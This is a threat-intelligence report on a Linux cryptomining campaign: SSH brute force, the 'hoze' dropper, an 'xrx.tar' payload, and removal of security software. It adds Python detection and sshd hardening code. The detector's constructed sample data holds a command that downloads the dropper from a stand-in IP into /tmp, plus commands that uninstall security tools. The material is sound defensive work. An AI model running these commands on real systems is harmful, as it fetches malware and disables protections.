Full Report
The researchers observed a malicious IP address, previously flagged for conducting SSH brute force attempts, communicating with a malicious shell script named hoze. This script downloads xrx.tar, an archive that contains more scripts that uninstall security software and enable...
Analysis Summary
# Tool/Technique: Hoze Shell Script / Xrx.tar Payload
## Overview
This entry describes a multi-stage attack observed originating from a known malicious IP, starting with SSH brute force. The primary payload involves a shell script named `hoze` which downloads and executes an archive (`xrx.tar`) containing secondary scripts and configuration files aimed at disabling security measures and deploying a crypto-miner.
## Technical Details
- Type: Malware (Shell Scripts/Payload Dropper)
- Platform: Linux (Implied by SSH targeting)
- Capabilities: Initial access via SSH brute force, retrieval of a staged archive from the attacker host, defense evasion (uninstalling security software), execution enablement (setting executable permissions on dropped files), communication with the malicious IP, and cryptominer deployment.
- First Seen: Unknown, but part of a campaign reported around September 2023.
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1110 - Brute Force
- T1110.001 - Password Guessing
- T1078 - Valid Accounts (the guessed credentials are then used for an interactive SSH login)
- **TA0002 - Execution**
- T1059 - Command and Scripting Interpreter
- T1059.004 - Unix Shell (`hoze` and the scripts unpacked from `xrx.tar`)
- **TA0005 - Defense Evasion**
- T1562 - Impair Defenses
- T1562.001 - Disable or Modify Tools (uninstalling security software)
- T1222.002 - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification (`chmod +x` on dropped files)
- **TA0011 - Command and Control**
- T1105 - Ingress Tool Transfer (`hoze` downloads `xrx.tar`)
- **TA0040 - Impact**
- T1496 - Resource Hijacking (crypto-mining)
## Functionality
### Core Capabilities
- Initial access gained through SSH brute force attempts conducted by the associated malicious IP.
- **Defense Evasion:** Scripts deploy components that actively uninstall existing security software on the compromised system.
- **Execution Enablement:** Scripts modify file permissions (most likely `chmod +x`) so that the components unpacked from `xrx.tar` can be executed; this is not persistence by itself, only preparation for the next stage.
### Advanced Features
- The deployment leverages an archive (`xrx.tar`) containing multiple scripts and a configuration file (`config.json`), indicating a structured, multi-file payload designed for specific post-exploitation tasks.
- **Resource Hijacking:** Deployment of a crypto-mining configuration file (`config.json`) strongly indicates the ultimate goal is cryptojacking.
## Indicators of Compromise
- File Hashes: N/A (Not provided in context)
- File Names: `hoze` (initial shell script), `xrx.tar` (archive), `config.json` (mining configuration)
- Registry Keys: N/A
- Network Indicators: Malicious IP address historically flagged for SSH brute force.
- Behavioral Indicators: Communication with the malicious IP, execution of shell scripts performing security software uninstallation, and setting executable permissions on dropped files.
## Associated Threat Actors
- Unknown/Unattributed specific group, but associated with an earlier CoinMiner campaign utilizing a similar public SSH key.
## Detection Methods
- **Signature-based detection:** Signatures on the file names (`hoze`, `xrx.tar`) and, once samples are available, on their hashes. File names are trivial for the operator to change, so treat name matches as a weak, high-precision-only indicator.
- **Behavioral detection:** Monitoring for clusters of failed SSH logins from one source followed by a success (T1110), execution of shell scripts that call package managers to remove security tooling (e.g., `apt remove`, `apt-get purge`, `yum remove`, `dnf remove`, `rpm -e`), downloads into and `chmod +x` on newly written files under world-writable paths such as `/tmp`, `/var/tmp` and `/dev/shm`, and `tar` extraction from those paths.
- **YARA rules:** Could be developed for the miner configuration: an XMRig-style `config.json` carries a `pools` array whose entries hold `url`, `user` and `pass`, plus keys such as `algo` (e.g. `rx/0`), `donate-level` and `cpu`/`opencl`/`cuda` sections.
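The three behavioural checks above (brute force followed by a successful login, security-tool removal and `chmod +x` in temp paths, and an XMRig-shaped `config.json`), written out as detection logic over constructed sample data. This is an added example, not code from the report or from the malware; the log lines, command lines, host name, IP addresses, package names and the `config.json` contents are all constructed for illustration, and the XMRig check is a JSON heuristic standing in for the YARA rule the report suggests.

```python
import json
import re
from collections import Counter

# Constructed sshd log lines in the syslog format sshd writes to auth.log/journald.
SAMPLE_AUTH_LOG = """\
Sep 12 10:00:01 host sshd[1201]: Failed password for root from 203.0.113.7 port 40210 ssh2
Sep 12 10:00:02 host sshd[1203]: Failed password for invalid user admin from 203.0.113.7 port 40212 ssh2
Sep 12 10:00:03 host sshd[1205]: Failed password for root from 203.0.113.7 port 40214 ssh2
Sep 12 10:00:04 host sshd[1207]: Failed password for root from 203.0.113.7 port 40216 ssh2
Sep 12 10:00:05 host sshd[1209]: Failed password for root from 203.0.113.7 port 40218 ssh2
Sep 12 10:00:06 host sshd[1211]: Accepted password for root from 203.0.113.7 port 40220 ssh2
Sep 12 10:05:00 host sshd[1300]: Failed password for alice from 198.51.100.9 port 50001 ssh2
Sep 12 10:05:30 host sshd[1302]: Accepted publickey for alice from 198.51.100.9 port 50002 ssh2
"""

FAILED_RE = re.compile(r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+)")
ACCEPTED_RE = re.compile(r"sshd\[\d+\]: Accepted \S+ for (\S+) from (\S+)")


def ssh_brute_force(log_text, threshold=5):
    """T1110: source IPs with >= threshold failed logins, plus any later
    successful login from such an IP (a brute force that worked)."""
    failures = Counter()
    hits = {}
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group(2)] += 1
            continue
        m = ACCEPTED_RE.search(line)
        if m and failures[m.group(2)] >= threshold:
            hits[m.group(2)] = {"user": m.group(1),
                                "failures_before_success": failures[m.group(2)]}
    suspects = {ip for ip, n in failures.items() if n >= threshold}
    return suspects, hits


# Constructed command lines, e.g. from auditd execve records or shell history.
# The download URL and the script name run.sh are hypothetical.
SAMPLE_COMMANDS = [
    "wget -q http://192.0.2.10/hoze -O /tmp/hoze",
    "tar -xf /tmp/xrx.tar -C /tmp/.x",
    "chmod +x /tmp/.x/run.sh",
    "apt remove -y clamav",
    "yum remove -y rkhunter",
    "ls -la /tmp",
]

UNINSTALL_RE = re.compile(
    r"\b(?:apt(?:-get)?\s+(?:remove|purge)|yum\s+(?:remove|erase)|dnf\s+remove|rpm\s+-e)\b")
SECURITY_PKGS = {"clamav", "rkhunter", "auditd", "falco", "osquery", "aide"}
# chmod with a symbolic +x or an octal mode containing an execute bit, on a
# path under a world-writable directory where droppers stage their files.
CHMOD_RE = re.compile(
    r"\bchmod\s+(?:\S*\+\S*x\S*|[0-7]*[1357][0-7]*)\s+(?:/tmp/|/var/tmp/|/dev/shm/)")
ARTEFACT_RE = re.compile(r"\b(?:hoze|xrx\.tar)\b")


def suspicious_commands(cmds):
    """Flag the post-access behaviour the report describes: security-tool
    removal (T1562.001), making dropped files executable (T1222.002) and
    handling of the named artefacts. Returns (label, command) pairs."""
    findings = []
    for c in cmds:
        if UNINSTALL_RE.search(c) and any(p in c for p in SECURITY_PKGS):
            findings.append(("security_tool_removal", c))
        elif CHMOD_RE.search(c):
            findings.append(("chmod_exec_in_tmp", c))
        elif ARTEFACT_RE.search(c):
            findings.append(("known_artefact_name", c))
    return findings


# Constructed config.json in XMRig's schema; the pool host and wallet are fake.
SAMPLE_CONFIG = json.dumps({
    "autosave": True, "donate-level": 1, "cpu": {"enabled": True},
    "pools": [{"algo": "rx/0", "url": "pool.example.invalid:3333",
               "user": "4WALLETADDRESS", "pass": "x", "tls": False}],
})


def looks_like_xmrig_config(text):
    """Heuristic for an XMRig-style config.json: a non-empty 'pools' array
    with url/user entries, backed by a miner-specific key or algo prefix."""
    try:
        cfg = json.loads(text)
    except ValueError:
        return False
    pools = cfg.get("pools") if isinstance(cfg, dict) else None
    if not isinstance(pools, list) or not pools:
        return False
    pool_dicts = [p for p in pools if isinstance(p, dict)]
    if not any("url" in p and "user" in p for p in pool_dicts):
        return False
    miner_keys = any(k in cfg for k in ("donate-level", "cpu", "opencl", "cuda"))
    miner_algo = any(str(p.get("algo", "")).startswith(("rx/", "cn")) for p in pool_dicts)
    return miner_keys or miner_algo


if __name__ == "__main__":
    print(ssh_brute_force(SAMPLE_AUTH_LOG))
    print(suspicious_commands(SAMPLE_COMMANDS))
    print(looks_like_xmrig_config(SAMPLE_CONFIG))
```

The brute-force check keys on the source IP rather than the account because the report's indicator is one IP spraying logins; a success preceded by a burst of failures from the same source is the highest-value alert here. The package-name watchlist keeps `apt remove` of an unrelated package from paging anyone; extend it with whatever EDR or AV packages are actually deployed.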
## Mitigation Strategies
- **Prevention measures:** Enforce strong, non-reused passwords for any SSH account that still uses them, and add multi-factor authentication where possible. Restrict SSH access with firewall or security-group rules to trusted source addresses, so a brute-forcing IP never reaches the daemon.
- **Hardening recommendations:** In `sshd_config`, disable password and keyboard-interactive authentication in favour of key-based login only, set `PermitRootLogin no`, lower `MaxAuthTries`, and limit logins to an `AllowUsers`/`AllowGroups` allowlist. Regularly audit installed packages and running services so the removal of a security tool is noticed rather than silently succeeding.
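The hardening points above as a small `sshd_config` audit: a weak, default-like fragment beside a hardened one, and a checker that reports which settings still leave the host exposed to the password guessing this campaign relies on. This is an added example, not part of the original report; both configuration fragments are constructed, and the policy values (`MaxAuthTries` of 3, the `deploy` and `ops` account names) are assumptions for illustration.

```python
import re

# Constructed: a default-ish sshd_config that leaves password brute force possible.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
"""

# Constructed: key-only logins, root locked out, tight retry budget, allowlisted users.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
LoginGraceTime 20
AllowUsers deploy ops
"""


def parse_sshd_config(text):
    """Return {keyword_lower: value} for the global section of an sshd_config.
    sshd honours the FIRST occurrence of a keyword, so later duplicates are
    ignored; 'Key value' and 'Key=value' are both accepted, as by sshd.
    Parsing stops at the first Match block, whose settings are conditional."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.lower().startswith("match"):
            break
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        cfg.setdefault(parts[0].lower(), parts[1].strip())
    return cfg


def audit_sshd_config(text, max_auth_tries=3):
    """Findings relevant to SSH password brute force. Defaults used when a
    keyword is absent are sshd's own: PasswordAuthentication yes,
    KbdInteractiveAuthentication yes, PermitRootLogin prohibit-password,
    MaxAuthTries 6."""
    cfg = parse_sshd_config(text)

    def get(key, default):
        return cfg.get(key, default).lower()

    findings = []
    if get("passwordauthentication", "yes") != "no":
        findings.append("PasswordAuthentication is not 'no': password guessing (T1110.001) remains possible")
    # Older sshd spells this ChallengeResponseAuthentication; PAM can still prompt for a password through it.
    if get("kbdinteractiveauthentication", get("challengeresponseauthentication", "yes")) != "no":
        findings.append("KbdInteractiveAuthentication is not 'no': PAM keyboard-interactive can still take a password")
    if get("permitrootlogin", "prohibit-password") == "yes":
        findings.append("PermitRootLogin yes: root is directly brute-forceable")
    try:
        tries = int(get("maxauthtries", "6"))
    except ValueError:
        tries = 6
    if tries > max_auth_tries:
        findings.append(f"MaxAuthTries {tries} exceeds policy of {max_auth_tries}")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("No AllowUsers/AllowGroups: every local account is an SSH target")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or ["ok"])
```

Run it against `/etc/ssh/sshd_config` after a change and before `systemctl reload sshd`; on hosts where `sshd -T` is available, auditing its output instead of the file is more reliable, since it shows the effective values after includes and defaults.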
## Related Tools/Techniques
- **XMRig:** The miner most likely deployed, implied by the presence of a `config.json` in the format XMRig uses rather than by a recovered binary.
- **CoinMiner Campaigns:** Connection noted to a previous campaign targeting the same infrastructure type (Linux SSH servers).